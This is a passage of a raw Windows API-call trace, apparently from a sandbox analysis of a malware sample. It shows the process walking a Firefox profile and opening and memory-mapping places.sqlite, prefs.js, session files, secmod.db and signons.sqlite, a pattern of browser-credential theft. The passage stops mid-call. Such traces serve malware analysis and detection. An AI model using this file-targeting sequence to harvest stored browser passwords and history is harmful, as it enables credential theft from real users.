[0589.920] CloseHandle (hObject=0x668) returned 1 [0589.920] CloseHandle (hObject=0x660) returned 1 [0589.920] LocalFree (hMem=0x56c300) returned 0x0 [0589.920] LocalFree (hMem=0x56afc8) returned 0x0 [0589.920] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.920] lstrlenW (lpString="\\") returned 1 [0589.920] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.920] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.920] lstrlenW (lpString="places.sqlite") returned 13 [0589.920] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.920] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.920] LocalFree (hMem=0x578c30) returned 0x0 [0589.920] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.920] CloseHandle (hObject=0x660) returned 1 [0589.920] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.920] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.920] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0589.920] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.920] CloseHandle (hObject=0x660) returned 1 [0589.920] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.921] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0589.921] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.921] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.013] LocalFree (hMem=0x56c300) returned 0x0 [0590.013] LocalFree (hMem=0x56afc8) returned 0x0 [0590.013] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.013] lstrlenW (lpString="\\") returned 1 [0590.013] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.013] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.013] lstrlenW (lpString="pluginreg.dat") returned 13 [0590.013] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.013] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0590.013] LocalFree (hMem=0x578c30) returned 0x0 [0590.013] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.013] CloseHandle (hObject=0x660) returned 1 [0590.013] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.013] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0590.013] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0590.013] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.013] CloseHandle (hObject=0x660) returned 1 [0590.014] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.014] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0590.014] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.014] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.014] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.014] CloseHandle (hObject=0x668) returned 1 [0590.014] CloseHandle (hObject=0x660) returned 1 [0590.014] LocalFree (hMem=0x56c300) returned 0x0 [0590.014] LocalFree (hMem=0x56afc8) returned 0x0 [0590.014] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.014] lstrlenW (lpString="\\") returned 1 [0590.014] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.014] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.014] lstrlenW (lpString="prefs.js") returned 8 [0590.014] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.014] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1d10 [0590.014] LocalFree (hMem=0x578c30) returned 0x0 [0590.014] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.014] CloseHandle (hObject=0x660) returned 1 [0590.015] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.015] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c30 [0590.015] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x578c30, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0590.015] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.015] CloseHandle (hObject=0x660) returned 1 [0590.015] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.015] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0590.015] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.015] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.015] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.015] CloseHandle (hObject=0x668) returned 1 [0590.015] CloseHandle (hObject=0x660) returned 1 [0590.015] LocalFree (hMem=0x578c30) returned 0x0 [0590.015] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.015] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.015] lstrlenW (lpString="\\") returned 1 [0590.015] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.015] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.015] lstrlenW (lpString="search.json") returned 11 [0590.016] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.016] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0590.016] LocalFree (hMem=0x578c30) returned 0x0 [0590.016] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.016] CloseHandle (hObject=0x660) returned 1 [0590.016] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.016] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0590.016] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0590.016] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.016] CloseHandle (hObject=0x660) returned 1 [0590.016] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.016] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0590.016] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.016] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.016] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.016] CloseHandle (hObject=0x668) returned 1 [0590.017] CloseHandle (hObject=0x660) returned 1 [0590.017] LocalFree (hMem=0x578c30) returned 0x0 [0590.017] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.017] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.017] lstrlenW (lpString="\\") returned 1 [0590.017] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.017] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.017] lstrlenW (lpString="secmod.db") returned 9 [0590.017] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.017] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0590.017] LocalFree (hMem=0x578c30) returned 0x0 [0590.017] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.017] CloseHandle (hObject=0x660) returned 1 [0590.017] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0590.017] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578c30 [0590.017] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x578c30, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0590.017] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.017] CloseHandle (hObject=0x660) returned 1 [0590.017] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.017] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.017] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.017] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.017] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.018] CloseHandle (hObject=0x668) returned 1 [0590.018] CloseHandle (hObject=0x660) returned 1 [0590.018] LocalFree (hMem=0x578c30) returned 0x0 [0590.018] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.018] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.018] lstrlenW (lpString="\\") returned 1 [0590.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.018] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.018] lstrlenW (lpString="sessionstore.bak") returned 16 [0590.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.018] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0590.018] LocalFree (hMem=0x578c30) returned 0x0 [0590.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.018] CloseHandle (hObject=0x660) returned 1 [0590.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.018] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0590.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0590.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.018] CloseHandle (hObject=0x660) returned 1 [0590.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.018] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0590.018] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.018] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.019] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.019] CloseHandle (hObject=0x668) returned 1 [0590.019] CloseHandle (hObject=0x660) returned 1 [0590.019] LocalFree (hMem=0x56c300) returned 0x0 [0590.019] LocalFree (hMem=0x56afc8) returned 0x0 [0590.019] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.019] lstrlenW (lpString="\\") returned 1 [0590.019] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.019] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.019] lstrlenW (lpString="sessionstore.js") returned 15 [0590.019] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.019] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0590.019] LocalFree (hMem=0x578c30) returned 0x0 [0590.019] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.019] CloseHandle (hObject=0x660) returned 1 [0590.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0590.019] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56c300 [0590.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x56c300, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0590.019] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.019] CloseHandle (hObject=0x660) returned 1 [0590.019] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.019] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0590.019] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.019] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.020] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.020] CloseHandle (hObject=0x668) returned 1 [0590.020] CloseHandle (hObject=0x660) returned 1 [0590.020] LocalFree (hMem=0x56c300) returned 0x0 [0590.020] LocalFree (hMem=0x56afc8) returned 0x0 [0590.020] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.020] lstrlenW (lpString="\\") returned 1 [0590.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.020] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.020] lstrlenW (lpString="signons.sqlite") returned 14 [0590.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.020] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0590.020] LocalFree (hMem=0x578c30) returned 0x0 [0590.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.020] CloseHandle (hObject=0x660) returned 1 [0590.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.020] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0590.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0590.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.020] CloseHandle (hObject=0x660) returned 1 [0590.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: 